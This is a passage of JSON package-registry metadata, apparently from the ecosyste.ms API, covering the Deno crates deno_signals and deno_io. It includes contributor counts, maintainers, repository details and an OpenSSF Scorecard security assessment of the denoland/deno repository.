","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-07-08T12:38:14.524Z","updated_at":"2025-07-08T12:38:14.524Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-07-08T12:38:14.628Z","updated_at":"2025-07-08T12:38:14.628Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":6465894,"name":"deno_io","ecosystem":"cargo","description":"IO primitives for Deno extensions","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":168,"first_release_published_at":"2023-03-03T15:05:13.827Z","latest_release_published_at":"2026-08-27T15:20:16.688Z","latest_release_number":"0.168.0","last_synced_at":"2026-09-07T22:57:45.059Z","created_at":"2023-03-03T15:24:27.352Z","updated_at":"2026-09-07T22:57:45.059Z","registry_url":"https://crates.io/crates/deno_io/","install_command":"cargo install deno_io","documentation_url":"https://docs.rs/deno_io/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"